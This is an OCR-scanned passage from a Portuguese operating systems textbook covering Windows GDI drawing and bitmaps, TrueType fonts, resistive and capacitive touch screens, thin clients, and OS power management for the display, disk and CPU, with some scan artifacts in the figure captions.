realmente desenhar na tela. 

As rotinas de desenho caem em quatro categorias: 
traçado de linhas e curvas, desenho de áreas preenchi- 
das, gerenciamento de mapas de bits e apresentação de 
texto. Já vimos um exemplo de tratamento de texto, en- 
tão vamos dar uma olhada rápida em outro. A chamada 


Rectangle(hdc, xleft, ytop, xright, ybottom); 


desenha um retângulo preenchido cujos vértices são 
(xleft, ytop) e (xright, ybottom). Por exemplo, 


Rectangle(hdc, 2, 1, 6, 4); 


desenhará o retângulo mostrado na Figura 5.37. A largu- 
ra e cor da linha, assim como a cor de preenchimento, 


[eU IT EÆEA Um exemplo de retângulo desenhado usando 
Rectangle. Cada quadrado representa um pixel. 
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são tiradas do contexto do dispositivo. Outras chamadas 
GDI são similares a essa. 


Mapas de bits (bitmaps) 


As rotinas GDI são exemplos de gráficos vetoriais. 
Eles são usados para colocar figuras geométricas e tex- 
to na tela. Podem ser escalados facilmente para telas 
maiores ou menores (desde que o número de pixels na 
tela seja o mesmo). Eles também são relativamente in- 
dependentes do dispositivo. Uma coleção de chamadas 
para rotinas GDI pode ser reunida em um arquivo que 
consiga descrever um desenho complexo. Esse arqui- 
vo é chamado de um meta-arquivo do Windows, e é 
amplamente usado para transmitir desenhos de um pro- 
grama do Windows para outro. Esses arquivos têm uma 
extensão .wmf. 

Muitos programas do Windows permitem que o 
usuário copie (parte de) um desenho e o coloque na área 
de transferência do Windows. O usuário pode então ir 
a outro programa e colar os conteúdos da área de trans- 
ferência em outro documento. Uma maneira de efetuar 
isso é fazer que o primeiro programa represente o dese- 
nho como um meta-arquivo do Windows e o coloque na 
área de transferência no formato .wmf. Existem também 
outras maneiras. 

Nem todas as imagens que os computadores manipu- 
lam podem ser geradas usando gráficos vetoriais. Fotogra- 
fias e vídeos, por exemplo, não usam gráficos vetoriais. 
Em vez disso, esses itens são escaneados sobrepondo-se 
uma grade na imagem. Os valores médios do vermelho, 
verde e azul de cada quadrante da grade são então amos- 
trados e salvos como o valor de um pixel. Esse arquivo é 
chamado de mapa de bits (bitmap). Existem muitos re- 
cursos para manipular os bitmaps no Windows. 

Outro uso para os bitmaps é para o texto. Uma ma- 
neira de representar um caractere em particular em al- 
guma fonte é um pequeno bitmap. Acrescentar texto à 
tela então torna-se uma questão de movimentar bitmaps. 

Uma maneira geral de usar os mapas de bits é atra- 
vés de uma rotina chamada BitBlt. Ela é chamada como 
a seguir: 


BitBlt(dsthdc, dx, dy, wid, ht, srchdc, sx, sy, rasterop); 


Em sua forma mais simples, ela copia um mapa de 
bits de um retângulo em uma janela para um retângulo 
em outra janela (ou a mesma). Os primeiros três pará- 
metros especificam a janela de destino e posição. Então 
vêm a largura e altura. Em seguida a janela da origem 
e posição. Observe que cada janela tem seu próprio 
sistema de coordenadas, com (0, 0) no vértice superior 
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esquerdo da janela. O último parâmetro será descrito a 
seguir. O efeito de 


BitBit(hdc2, 1, 2, 5, 7, hdc1, 2, 2, SRCCOPY); 


é mostrado na Figura 5.38. Observe cuidadosamente 
que a área total 5 x 7 da letra A foi copiada, incluindo a 
cor do segundo plano. 

BitBlt pode fazer mais que somente copiar mapas de 
bits. O último parâmetro proporciona a possibilidade de 
realizar operações Booleanas a fim de combinar o mapa 
de bits fonte com o mapa de bits destino. Por exemplo, a 
operação lógica OU pode ser aplicada entre a origem e o 
destino para se fundir com ele. Também pode ser usada 
a operação OU EXCLUSIVO, que mantém as caracte- 
rísticas tanto da origem quanto do destino. 

Um problema com mapas de bits é que eles não são 
extensíveis. Um caractere que está em uma caixa de 
8 x 12 em uma tela de 640 x 480 parecerá razoável. No 
entanto, se esse mapa de bits for copiado para uma pá- 
gina impressa de 1200 pontos/polegada, o que é 10.200 
bits x 13200 bits, a largura do caractere (8 pixels) será 
de 8/1200 polegadas ou 0,17 mm. Além disso, copiar 
entre dispositivos com propriedades de cores diferentes 
ou entre monocromático e colorido não funciona bem. 

Por essa razão, o Windows também suporta uma es- 
trutura de dados chamada mapa de bits independente de 
dispositivo (Device Independent Bitmap — DIB). Ar- 
quivos usando esse formato usam a extensão .bmp. Eles 
têm cabeçalhos de arquivo e informação e uma tabela de 
cores antes dos pixels. Essa informação facilita a movi- 
mentação de mapas de bits entre dispositivos diferentes. 


Fontes 


Nas versões do Windows antes do 3.1, os caracte- 
res eram representados como mapas de bits e copiados 
na tela ou impressora usando BitBlt. O problema com 


isso, como vimos há pouco, é que um mapa de bits que 
faz sentido na tela é pequeno demais para a impressora. 
Também, um mapa de bits é necessário para cada carac- 
tere em cada tamanho. Em outras palavras, dado o mapa 
de bits para A no padrão de 10 pontos, não há como 
calculá-lo para o padrão de 12 pontos. Uma vez que 
podem ser necessários todos os caracteres de todas as 
fontes para tamanhos que vão de 4 pontos a 120 pontos, 
um vasto número de bitmaps era necessário. O sistema 
inteiro era simplesmente inadequado demais para texto. 
A solução foi a introdução das fontes TrueType, que 
não são bitmaps, mas contornos de caracteres. Cada 
caractere TrueType é definido por uma sequência de 
pontos em torno do seu perímetro. Todos os pontos são 
relativos à origem (0, 0). Usando esse sistema, é fácil 
colocar os caracteres em uma escala crescente ou de- 
crescente. Tudo o que precisa ser feito é multiplicar cada 
coordenada pelo mesmo fator da escala. Dessa maneira, 
um caractere TrueType pode ser colocado em uma es- 
cala para cima ou para baixo até qualquer tamanho de 
pontos, mesmo tamanhos de pontos fracionais. Uma vez 
no tamanho adequado, os pontos podem ser conectados 
usando o conhecido algoritmo ligue-os-pontos (follow- 
-the-dots) ensinado no jardim de infância (observe que 
jardins de infância modernos usam superfícies curvas 
para suavizar os resultados). Após o contorno ter sido 
concluído, o caractere pode ser preenchido. Um exem- 
plo de alguns caracteres colocados em escalas para três 
tamanhos de pontos diferentes é dado na Figura 5.39. 
Assim que o caractere preenchido estiver disponi- 
vel em forma matemática, ele pode ser varrido, isto é, 
convertido em um mapa de bits para qualquer que seja 
a resolução desejada. Ao colocar primeiro em escala e 
então varrer, podemos nos certificar de que os caracte- 
res exibidos na tela ou impressos na impressora serão 
o mais próximos quanto possível, diferenciando-se so- 
mente na precisão do erro. Para melhorar ainda mais 
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(eU) TVI] Alguns exemplos de contornos de caracteres em diferentes tamanhos de pontos. 


vw abcdefgh 


~ abecdefgh 


-abcdefgh 


a qualidade, é possível embutir dicas em cada caracte- 
re dizendo como realizar a varredura. Por exemplo, o 
acabamento das pontas laterais no topo da letra T deve 
ser idêntico, algo que talvez não fosse o caso devido 
a um erro de arredondamento. As dicas melhoram a 
aparência final. 


Telas de toque 


Mais e mais a tela é usada como um dispositivo de 
entrada também. Especialmente em smartphones, ta- 
blets e outros dispositivos ultraportáteis, é conveniente 
tocar e “limpar” a tela com seu dedo (ou um stylus). A 
experiência do usuário é diferente e mais intuitiva do 
que com um dispositivo como um mouse, tendo em vis- 
ta que o usuário interage diretamente com objetos na 
tela. Pesquisas mostraram que mesmo orangotangos, 
outros primatas e crianças pequenas são capazes de ope- 
rar dispositivos baseados no toque. 

Um dispositivo de toque não é necessariamente uma 
tela. Dispositivos de toque caem em duas categorias: 
opacos e transparentes. Um dispositivo de toque opa- 
co típico é o touchpad em um notebook. Um exemplo 
de um dispositivo transparente é a tela de toque em um 
smartphone ou tablet. Nessa seção, no entanto, vamos 
nos limitar às telas de toque. 

Assim como muitas coisas que entram na moda na 
indústria dos computadores, as telas de toque não são 
exatamente novas. Já em 1965, E.A. Johnson da British 
Royal Radar Establishment descreveu uma tela de to- 
que (capacitiva) que, embora rudimentar, serviu como 


precursora das telas que vemos hoje. A maioria das telas 
de toque modernas são resistivas ou capacitivas. 

Telas resistivas têm uma superfície plástica fle- 
xível no topo. O plástico em si não tem nada de es- 
pecial, exceto que ele é mais resistente a arranhões 
do que o plástico comum. No entanto, um filme fino 
de ITO (Indium Tin Oxide — Óxido de Índio-Esta- 
nho), ou algum material condutivo similar, é impres- 
so em linhas finas no interior da superfície. Abaixo 
dela, mas sem tocá-la realmente, há uma segunda su- 
perfície também revestida com uma camada de ITO. 
Na superfície de cima, a carga corre na direção ver- 
tical e há conexões condutivas na parte de cima e de 
baixo. Na camada de baixo a carga corre horizontal- 
mente e há conexões à esquerda e à direita. Ao tocar 
a tela, você provoca uma “depressão” no plástico de 
maneira que a camada de cima do ITO toca a cama- 
da de baixo. Para descobrir a posição exata do dedo 
ou stylus tocando-a, tudo o que você precisa fazer é 
medir a resistência em ambas as direções em todas 
as posições horizontais da parte de baixo e todas as 
posições verticais da camada de cima. 

Telas capacitivas têm duas superfícies duras, tipica- 
mente vidro, cada uma revestida com ITO. Uma confi- 
guração típica é ter o ITO acrescentado a cada superficie 
em linhas paralelas, onde as linhas na camada de cima 
são perpendiculares às linhas na camada de baixo. Por 
exemplo, a camada de cima pode ser revestida de linhas 
finas em uma direção vertical, enquanto a camada de 
baixo tem um padrão similarmente em faixas na direção 
horizontal. As duas superfícies carregadas, separadas 
pelo ar, formam uma grade de capacitores realmente 
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pequenos. As voltagens são aplicadas alternativamente 
às linhas horizontais e verticais, enquanto os valores das 
voltagens, que são afetados pela capacitância de cada 
interseção, são lidos nos outros. Quando coloca o seu 
dedo na tela, você muda a capacitância local. Ao medir 
muito precisamente as minúsculas mudanças na volta- 
gem em toda parte, é possível descobrir a localização 
do dedo na tela. Essa operação é repetida muitas vezes 
por segundo com as coordenadas alimentadas por toque 
para o driver do dispositivo como um fluxo de pares (x, y). 
O processamento além desse ponto, como determinar 
se o usuário está apontando, apertando, expandindo ou 
varrendo, é feito pelo sistema operacional. 

O que é bacana a respeito das telas resistivas é que 
a pressão determina o resultado das medidas. Em ou- 
tras palavras, elas funcionarão mesmo que você esteja 
usando luvas no frio. Isso não é verdade a respeito de 
telas capacitivas, a não ser que você use luvas espe- 
ciais. Por exemplo, você pode costurar um fio condu- 
tivo (como nylon banhado em prata) pelas pontas dos 
dedos das luvas, ou se você não for muito chegado a 
costura, compre-as prontas. Ou então, você pode cor- 
tar as pontas das suas luvas e acabar com o problema 
em 10s. 

O que não é tão bacana a respeito das telas resisti- 
vas é que elas geralmente não suportam toques múlti- 
plos, uma técnica que detecta vários toques ao mesmo 
tempo. Elas permitem que você manipule objetos na 
tela com dois ou mais dedos. As pessoas gostam dos 
toques múltiplos porque isso lhes possibilita realiza- 
rem gestos de toque-expansão com dois dedos para 
aumentar ou diminuir uma imagem ou documento. 
Imagine que os dois dedos estão em (3, 3) e (8, 8). Em 
consequência, a tela resistiva pode observar uma mu- 
dança na resistência nas linhas verticais x = 3 e x = 8, 
e nas linhas horizontais y = 3 e y = 8. Agora considere 
um cenário diferente com os dedos em (3, 8) e (8, 3), 
que são os vértices opostos do retângulo cujos vértices 
são (3, 3), (8, 3), (8, 8) e (3, 8). A resistência em preci- 
samente as mesmas linhas mudou, portanto o software 
não tem como dizer qual dos dois cenários se mantém. 
Esse problema é chamado de ghosting (efeito fantas- 
ma). Como as telas capacitivas enviam um fluxo de 
coordenadas (x, y), elas são mais propensas a suportar 
os toques múltiplos. 

Manipular uma tela de toque com apenas um úni- 
co dedo pode ser considerado WIMP — você simples- 
mente substitui o ponteiro do mouse com seu stylus ou 
dedo indicador. O uso de múltiplos toques é um pouco 
mais complicado. Tocar a tela com cinco dedos é como 





1 Brincadeira do autor com um golpe mítico do kung-fu. (N. do T.) 


empurrar cinco ponteiros de mouses sobre a tela ao 
mesmo tempo e isso claramente muda as coisas de figu- 
ra para o gerenciador da janela. As telas para múltiplos 
toques tornaram-se onipresentes e cada vez mais sen- 
síveis e precisas. Mesmo assim, é incerto se a Técnica 
dos Cinco Pontos que Explodem o Coração! tem algum 
efeito sobre a CPU. 


5.7 Clientes magros (thin clients) 


Ao longo dos anos, o paradigma do computador 
principal oscilou entre a computação centralizada e a 
descentralizada. Os primeiros computadores, como o 
ENIAC, eram na realidade computadores pessoais (ape- 
sar de seu tamanho grande), pois apenas uma pessoa 
podia usar um de cada vez. Então vieram os sistemas de 
tempo compartilhado, nos quais muitos usuários remo- 
tos em terminais simples compartilhavam de um gran- 
de computador central. Em seguida, veio a era do PC, 
na qual os usuários tinham seus próprios computadores 
pessoais novamente. 

Embora o modelo do PC descentralizado tenha van- 
tagens, ele também tem algumas desvantagens severas 
que estão apenas começando a ser levadas a sério. Pro- 
vavelmente o maior problema é que cada PC tem um 
disco rígido grande e um software complexo que de- 
vem ser mantidos. Por exemplo, quando é lançado um 
novo sistema operacional, é necessário um esforço sig- 
nificativo para atualizar cada máquina em separado. Na 
maioria das corporações, os custos da mão de obra para 
realizar esse tipo de manutenção de software são muito 
superiores aos custos com hardware e software efetivos. 
Para os usuários caseiros, a mão de obra é tecnicamente 
gratuita, mas poucas pessoas são capazes de fazê-lo cor- 
retamente e menos gente ainda gosta de fazê-lo. Com 
um sistema centralizado, apenas uma ou algumas pou- 
cas máquinas precisam ser atualizadas e elas têm uma 
equipe de especialistas para realizar o trabalho. 

Uma questão relacionada é que os usuários deveriam 
fazer backups regulares de seus sistemas de arquivos de 
gigabytes, mas poucos o fazem. Quando acontece um 
desastre, o que se vê é muita lamentação! Com um sis- 
tema centralizado, backups podem ser feitos todas as 
noites por robôs de fita automatizados. 

Outra vantagem é que o compartilhamento de recur- 
sos é mais fácil com sistemas centralizados. Um sistema 
com 256 usuários remotos, cada um com 256 MB de 
RAM, terá a maior parte dessa RAM ociosa a maior 
parte do tempo. Com um sistema centralizado com 


64 GB de RAM, nunca acontece de um algum usuário 
precisar temporariamente de muita RAM, mas não con- 
seguir porque ela está no PC de outra pessoa. O mesmo 
argumento se mantém para o espaço de disco e outros 
recursos. 

Por fim, estamos começando a ver uma mudança de 
uma computação centrada nos PCs para uma compu- 
tação centrada na web. Uma área já bem adiantada é o 
e-mail. As pessoas costumavam ter seu e-mail enviado 
para sua máquina em casa e lê-lo lá. Hoje, muita gente 
se conecta ao Gmail, Hotmail ou Yahoo e lê seu e-mail 
ali. O próximo passo será as pessoas se conectando em 
outros sites na web para editar textos, produzir planilhas 
e outras coisas que costumavam exigir o software de 
PCs. É possível até que por fim o único software que as 
pessoas executarão em seus PCs será um navegador da 
web, e talvez nem isso. 

Dizer que a maioria dos usuários quer uma compu- 
tação interativa de alto desempenho, mas não quer re- 
almente administrar um computador, provavelmente 
seja uma conclusão justa. Isso levou os pesquisadores a 
reexaminar os sistemas de tempo compartilhado usan- 
do terminais burros (agora educadamente chamados de 
clientes magros) que atendem às expectativas de termi- 
nais modernos. X foi um passo nessa direção e terminais 
X dedicados foram populares por um tempo, mas caíram 
em desuso pois eles custavam tanto quanto os PCs, po- 
diam realizar menos e ainda precisavam de alguma ma- 
nutenção de software. O Santo Graal seria um sistema 
de computação interativo de alto desempenho no qual as 
máquinas dos usuários não tivessem software algum. De 
maneira bastante interessante, essa meta é atingível. 

Um dos clientes magros mais conhecidos é o Chro- 
mebook. Ele é ativamente promovido pelo Google, mas 
com uma ampla variedade de fabricantes fornecendo 
uma ampla variedade de modelos. O notebook execu- 
ta ChromeOS que é baseado no Linux e no navegador 
Chrome Web. Presume-se que esteja on-line o tempo 
inteiro. A maior parte dos outros softwares está hospe- 
dada na web na forma de Web Apps, fazendo a pilha de 
software no próprio Chromebook ser consideravelmen- 
te menor do que na maioria dos notebooks tradicionais. 
Por outro lado, um sistema que executa um sistema Li- 
nux inteiro e um navegador Chrome não é exatamente 
um anoréxico também. 


5.8 Gerenciamento de energia 


O primeiro computador eletrônico de propósito ge- 
ral, o ENIAC, tinha 18.000 válvulas e consumia 140.000 
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watts de energia. Em consequência, ele fez subir muito as 
contas de energia elétrica. Após a invenção do transistor, 
o uso de energia caiu dramaticamente e a indústria de 
computadores perdeu o interesse a respeito das exigên- 
cias de energia. No entanto, hoje em dia o gerenciamento 
de energia está de volta ao centro das atenções por vá- 
rias razões, e o sistema operacional exerce um papel na 
questão. 

Vamos começar com os PCs de mesa. Um PC de 
mesa muitas vezes tem um suprimento de energia de 
200 watts (que é tipicamente 85% eficiente, isto é, per- 
de 15% da energia que recebe para o calor). Se 100 mi- 
lhões dessas máquinas forem ligadas ao mesmo tempo 
mundo afora, juntas elas usarão 20.000 megawatts de 
eletricidade. Isso é uma produção total de 20 usinas nu- 
cleares de médio porte. Se as exigências de energia pu- 
dessem ser cortadas pela metade, poderíamos nos livrar 
de 10 usinas nucleares. Do ponto de vista ambiental, 
livrar-se de 10 usinas nucleares (ou um número equiva- 
lente de usinas movidas a combustíveis fósseis) é uma 
grande vitória que vale a pena ser buscada. 

A outra situação em que a energia é uma questão 
importante é nos computadores movidos a bateria, in- 
cluindo notebooks, laptops, palmtops e Webpads, entre 
outros. O cerne do problema é que as baterias não con- 
seguem conter carga suficiente para durar muito tem- 
po, algumas horas no máximo. Além disso, apesar de 
enormes esforços por parte das empresas de baterias, 
fabricantes de computadores e de produtos eletrônicos, 
o progresso é mínimo. Para uma indústria acostuma- 
da a dobrar o seu desempenho a cada 18 meses (lei de 
Moore), não apresentar progresso algum parece uma 
violação das leis da física, mas essa é a situação atual. 
Em consequência, fazer que os computadores usem me- 
nos energia de maneira que as baterias existentes durem 
mais é uma prioridade na agenda de todos. O sistema 
operacional tem um papel fundamental aqui, como ve- 
remos a seguir. 

No nível mais baixo os vendedores de hardware 
estão tentando tornar os seus componentes eletrôni- 
cos mais eficientes em termos de energia. As técnicas 
usadas incluem a redução do tamanho de transistores, 
o escalonamento dinâmico de tensão, o uso de barra- 
mentos adiabáticos e low-swing, e técnicas similares. 
Essas questões estão fora do escopo deste livro, mas os 
leitores interessados podem encontrar uma boa pesquisa 
em um estudo de Venkatachalam e Franz (2005). 

Existem duas abordagens gerais para reduzir o con- 
sumo de energia. A primeira é o sistema operacional 
desligar partes do computador (na maior parte disposi- 
tivos de E/S) quando elas não estão sendo usadas, pois 
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um dispositivo que esta desligado usa pouca ou nenhu- 
ma energia. A segunda abordagem é o programa apli- 
cativo usar menos energia, possivelmente degradando 
a qualidade da experiência do usuário, a fim de esten- 
der o tempo da bateria. Examinaremos cada uma dessas 
abordagens em sequência, mas primeiro abordaremos 
brevemente o projeto de hardware em relação ao uso 
da energia. 


5.8.1 Questões de hardware 


As baterias vêm em dois tipos gerais: descartáveis 
e recarregáveis. As baterias descartáveis (mais comu- 
mente as do tipo AAA, AA e D) podem ser usadas para 
executar dispositivos de mão, mas não têm energia su- 
ficiente para suprir notebooks com telas grandes e re- 
luzentes. Uma bateria recarregável, por sua vez, pode 
armazenar energia suficiente para suprir um notebook 
por algumas horas. Baterias de níquel cádmio costuma- 
vam dominar esse nicho, mas deram lugar às baterias 
híbridas de metal níquel, que duram mais e não poluem 
tanto o meio ambiente quando são eventualmente des- 
cartadas. Baterias de íon lítio são ainda melhores, e po- 
dem ser recarregadas sem primeiro serem utilizadas por 
completo, mas sua capacidade também é severamente 
limitada. 

A abordagem geral que a maioria dos vendedores de 
computadores escolhe para a conservação da bateria é 
projetar a CPU, memória e dispositivos de E/S para te- 
rem múltiplos estados: ligados, dormindo, hibernando e 
desligados. Para usar o dispositivo, ele precisa estar liga- 
do. Quando o dispositivo não for necessário por um curto 
período de tempo, ele pode ser colocado para dormir, o 
que reduz o consumo de energia. Quando se espera que 
ele não seja necessário por um intervalo de tempo mais 
longo, ele pode ser colocado para hibernar, o que reduz o 
consumo da energia ainda mais. A escolha que precisa ser 
feita aqui é que tirar um dispositivo da hibernação muitas 
vezes leva mais tempo e dispende mais energia do que 
tirá-lo do estado de adormecimento. Por fim, quando um 
dispositivo está desligado, ele não faz nada e não conso- 
me energia. Nem todos os dispositivos têm esses estados, 
mas quando eles têm, cabe ao sistema operacional geren- 
ciar as transições de estado nos momentos certos. 

Alguns computadores têm dois ou até três botões de 
energia. Um deles pode colocar todo o computador no 
estado de dormência, do qual ele pode ser acordado ra- 
pidamente ao se digitar um caractere ou mover o mou- 
se. Outro pode colocar o computador em hibernação, 
da qual seu despertar leva bem mais tempo. Em ambos 
os casos, esses botões não fazem nada além de enviar 


um sinal para o sistema operacional, que realiza o res- 
to no software. Em alguns países, dispositivos elétricos 
devem, por lei, ter uma chave mecânica de energia que 
interrompa um circuito e remova a energia do dispositi- 
vo por questões de segurança. Para obedecer a essa lei, 
outra chave talvez seja necessária. 

O gerenciamento de energia provoca uma série de 
questões com que o sistema operacional precisa lidar. 
Muitas delas relacionam-se com a hibernação de recur- 
sos — seletiva e temporariamente desligar dispositivos, 
ou pelo menos reduzir seu consumo de energia quando 
estão ociosos. As perguntas que devem ser respondidas 
incluem: quais dispositivos podem ser controlados? Eles 
têm apenas os estados ligado/desligado, ou existem esta- 
dos intermediários? Quanta energia é poupada nos esta- 
dos de baixo consumo? Gasta-se energia para reiniciar o 
dispositivo? Algum contexto precisa ser salvo quando se 
vai para o estado de baixo consumo? Quanto tempo leva 
para retornar para o estado de energia plena? É claro, as 
respostas para essas questões variam de dispositivo para 
dispositivo, de maneira que o sistema operacional precisa 
ser capaz de lidar com uma gama de possibilidades. 

Vários pesquisadores examinaram notebooks para ver 
em que ponto a energia se esgota. Li et al. (1994) medi- 
ram várias cargas de trabalho e chegaram às conclusões 
mostradas na Figura 5.40. Lorch e Smith (1998) tomaram 
medidas em outras máquinas e chegaram às conclusões 
mostradas na Figura 5.40. Weiser et al. (1994) também 
fizeram medidas, mas não publicaram os valores numé- 
ricos. Eles apenas declararam que os três maiores consu- 
midores de energia eram a tela, o disco rígido e a CPU, 
nessa ordem. Embora esses números não concordem to- 
talmente, talvez porque as diferentes marcas de computa- 
dores mensuradas de fato tenham exigências diversas de 
energia, parece claro que a tela, o disco rígido e a CPU 
são alvos óbvios para poupar energia. Em dispositivos 
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Dispositivo Li et al. (1994) Lorch e Smith (1998) 
Tela 68% 39% 
CPU 12% 18% 
Disco rígido 20% 12% 
Modem 6% 
Som 2% 
Memória 0,5% 1% 
Outros 22% 

















como smartphones pode haver outros drenos de energia, 
como o rádio e o GPS. Embora nos concentremos nas 
telas, discos, CPUs e memória nesta seção, os princípios 
são os mesmos para outros periféricos. 


5.8.2 Questões do sistema operacional 


O sistema operacional tem um papel fundamental no 
gerenciamento da energia. Ele controla todos os dispo- 
sitivos, por isso tem de decidir o que desligar e quando 
fazê-lo. Se desligar um dispositivo e esse dispositivo for 
necessário imediatamente de novo, pode haver um atra- 
so incômodo enquanto ele é reiniciado. Por outro lado, 
se ele esperar tempo demais para desligar um dispositi- 
vo, a energia é desperdiçada por nada. 

O truque é encontrar algoritmos e heurísticas que dei- 
xem o sistema operacional tomar boas decisões a respeito 
do que desligar e quando. O problema é que “boas de- 
cisões” é algo muito subjetivo. Um usuário pode achar 
aceitável que após 30 s de não utilização, o computador 
leve 2 s para responder a uma tecla pressionada. Outro 
usuário pode perder a paciência com a mesma espera. Na 
ausência da entrada de áudio, o computador não sabe dis- 
tinguir entre esses usuários. 


Monitor 


Vamos agora examinar os grandes gastadores do or- 
çamento de energia para ver o que pode ser feito com 
cada um deles. Um dos itens mais importantes no orça- 
mento de energia de todo mundo é o monitor. Para obter 
uma imagem clara e nítida, a tela deve ser iluminada 
por trás e isso consome uma energia substancial. Muitos 
sistemas operacionais tentam poupar energia desligan- 
do o monitor quando não há atividade alguma por um 
número determinado de minutos. Muitas vezes o usuá- 
rio pode decidir qual deve ser esse intervalo, devendo 
escolher entre o desligamento frequente da tela e o con- 
sumo rápido da bateria (o que provavelmente o usuário 
não deseja). O desligamento do monitor é um estado de 
dormência, pois ele pode ser regenerado (da RAM de 
vídeo) quase instantaneamente quando qualquer tecla 
for acionada ou o dispositivo apontador for movido. 

Uma melhoria possível foi proposta por Flinn e 
Satyanarayanan (2004). Eles sugeriram que o monitor 
consista em um determinado número de zonas que po- 
dem ser ligadas ou desligadas independentemente. Na 
Figura 5.41, descrevemos 16 zonas, usando linhas tra- 
cejadas para separá-las. Quando o cursor está na jane- 
la 2, como mostrado na Figura 5.41(a), apenas quatro 
zonas do canto inferior direito precisam ser iluminadas. 
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As outras 12 podem ficar escuras, poupando 3/4 da 
energia da tela. 

Quando o usuário move o cursor para a janela 1, as 
zonas para a janela 2 podem ser escurecidas e as zonas 
atrás da janela 1 podem ser iluminadas. No entanto, como 
a janela 1 envolve 9 zonas, mais energia é necessária. Se 
o gerenciador de janelas consegue perceber o que está 
acontecendo, ele pode automaticamente mover a janela 1 
para que ela se enquadre em quatro zonas, com um tipo 
de foco instantâneo de zona, como mostrado na Figura 
5.41(b). Para realizar essa redução de 9/16 para 4/16 de 
energia total, o gerenciador de janelas precisa entender de 
gerenciamento de energia ou ser capaz de aceitar instru- 
ções de alguma outra parte do sistema que o compreenda. 
Ainda mais sofisticada seria a capacidade de iluminar em 
parte uma janela que não estivesse completamente cheia 
(por exemplo, uma janela contendo linhas curtas de texto 
poderia ficar com o lado direito no escuro). 


Disco rígido 


Outro vilão importante é o disco rígido. Ele conso- 
me uma energia substancial para manter-se girando em 
alta velocidade, mesmo que não haja acessos. Muitos 
computadores, em especial notebooks, param de girar 


O uso de zonas para a retroiluminação (back 
lighting) do monitor. (a) Quando a janela 2 é 
escolhida, ela não é movida. (b) Quando a janela 
1 é escolhida, ela é movida para reduzir o número 
de zonas iluminadas. 


Janela 1 


Janela 2 





Janela 2 
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o disco após determinado número de minutos com ele 
ocioso. Quando é requisitado em seguida, o disco é 
girado outra vez. Infelizmente, um disco parado está 
hibernando em vez de dormindo, pois ele leva alguns 
segundos para girar novamente, o que causa atrasos 
consideráveis para o usuário. 

Além disso, reiniciar o disco consome uma energia 
considerável. Em consequência, todo disco tem um 
tempo característico, T „que é o seu ponto de equilíbrio, 
muitas vezes na faixa de 5 a 15 s. Suponha que o próxi- 
mo acesso de disco é esperado que ocorra algum tempo 
t no futuro. Se ¢ < 7, menos energia é consumida para 
manter o disco girando do que pará-lo e então reiniciali- 
zá-lo tão rapidamente. Se t > T „ a energia poupada faz 
valer a pena parar o disco e então reinicializá-lo de novo 
bem mais tarde. Se uma boa previsão pudesse ser feita 
(por exemplo, baseada em padrões de acesso passados), 
o sistema operacional poderia fazer boas previsões de 
parada e poupar energia. Na prática, a maioria dos siste- 
mas é conservadora e para o disco somente após alguns 
minutos de inatividade. 

Outra maneira de poupar energia é ter uma cache de 
disco substancial na RAM. Se um bloco necessário está 
na cache, um disco ocioso não precisa ser ativado para 
satisfazer a leitura. Similarmente, se uma escrita para o 
disco pode ser armazenada na cache, um disco parado 
não precisa ser ativado apenas para lidar com a escrita. 
O disco pode permanecer desligado até que a cache es- 
teja cheia ou que ocorra uma lacuna na leitura. 

Outra maneira de evitar que um disco seja ativado des- 
necessariamente é fazer que o sistema operacional man- 
tenha os programas em execução informados a respeito 
do estado do disco enviando-lhes mensagens ou sinais. 
Alguns programas têm escritas programadas que podem 
ser “puladas” ou postergadas. Por exemplo, um editor de 
texto pode ser ajustado para escrever o arquivo que está 
sendo editado para o disco de tempos em tempos. Se o 
editor de texto sabe que o disco está desligado naquele 
momento em que ele normalmente escreveria o arquivo, 
pode postergar essa escrita até que o disco esteja ligado. 


A CPU 


A CPU também pode ser gerenciada para poupar 
energia. O software pode colocar a CPU de um note- 
book para dormir, reduzindo o uso de energia a qua- 
se zero. A única coisa que ela pode fazer nesse estado 
é despertar quando ocorre uma interrupção. Portanto, 
sempre que a CPU fica ociosa, seja esperando por E/S 
ou porque não há trabalho para fazer, ela vai dormir. 

Em muitos computadores, há uma relação entre a 
voltagem da CPU, ciclo do relógio e consumo de ener- 
gia. A voltagem da CPU muitas vezes pode ser reduzida 
no software, o que poupa energia, mas também reduz o 
ciclo do relógio (mais ou menos linearmente). Tendo em 
vista que a energia consumida é proporcional ao qua- 
drado da voltagem, cortar a voltagem pela metade torna 
a CPU cerca de 50% mais lenta, mas a 4 da energia. 

Essa propriedade pode ser explorada para programas 
com prazos bem definidos, como programas de visua- 
lização multimídia que devem descomprimir e mostrar 
no vídeo um quadro a cada 40 ms e ficam ociosos se o 
fazem mais rapidamente. Suponha que uma CPU usa x 
joules enquanto executa em velocidade máxima por 40 ms 
e x/4 joules com a metade da velocidade. Se um pro- 
grama de visualização multimídia pode descomprimir e 
mostrar no vídeo um quadro em 20 ms, o sistema opera- 
cional pode executar em velocidade máxima por 20 ms 
e então desligar por 20 ms para um consumo de energia 
total de x/2 joules. Alternativamente, ele pode executar 
com metade da energia e apenas cumprir o prazo, mas 
usar só x/4 joules em vez disso. A Figura 5.42 mostra 
uma comparação entre a execução em velocidade máxi- 
ma e em energia máxima por algum intervalo de tempo 
e na metade da velocidade e em 1/4 da energia por duas 
vezes o tempo. Em ambos os casos, o mesmo trabalho 
é realizado, mas na Figura 5.42(b) somente metade da 
energia é consumida ao realizá-lo. 

De maneira similar, se um usuário está digitando 
1 caractere/s, mas o trabalho necessário para proces- 
sar o caractere leva 100 ms, é melhor para o sistema 


[FIGURA 5.42 | (a) Funcionamento com velocidade total. (b) Redução da voltagem à metade: metade da velocidade e um quarto da energia. 
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operacional detectar os longos períodos ociosos e desa- 
celerar a CPU por um fator de 10. Resumindo, executar 
lentamente é mais eficiente em termos de consumo de 
energia do que executar rapidamente. 

De maneira interessante, reduzir a velocidade de nú- 
cleos da CPU nem sempre implica uma redução no de- 
sempenho. Hruby et al. (2013) mostram que às vezes o 
desempenho da pilha de software de rede melhora com nú- 
cleos mais lentos. A explicação é que o núcleo pode ser rá- 
pido demais para o seu próprio bem. Por exemplo, imagine 
uma CPU com diversos núcleos rápidos, onde um núcleo é 
responsável pela transmissão dos pacotes de rede em prol 
de um produtor executando em outro núcleo. O produtor 
e a pilha de rede comunicam-se diretamente via uma me- 
mória compartilhada e ambos executam em núcleos dedi- 
cados. O produtor realiza uma quantidade considerável de 
computação e não consegue acompanhar o núcleo da pilha 
de rede. Em uma execução típica, a rede transmitirá tudo o 
que ela tem para transmitir e fará uma verificação da me- 
mória compartilhada por algum montante de tempo para 
ver se realmente não há mais dados para transmitir. Por 
